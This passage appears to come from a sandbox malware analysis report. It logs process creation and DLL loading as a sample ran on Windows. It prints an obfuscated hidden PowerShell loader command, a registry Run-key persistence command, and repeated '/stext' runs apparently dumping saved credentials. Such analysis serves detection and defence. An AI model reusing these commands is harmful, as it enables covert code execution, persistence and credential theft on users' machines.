          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn2.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ntmarta.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: webio.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: nlaapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: shcore.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rstrtmgr.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
          Source: C:\Windows\SysWOW64\reg.exe Section loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\reg.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: webio.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: nlaapi.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: shcore.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rstrtmgr.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: bcrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: rpcrtremote.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: pstorec.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: atl.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64win.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: mozglue.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: dbghelp.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: msvcp140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: vcruntime140.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: ucrtbase.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
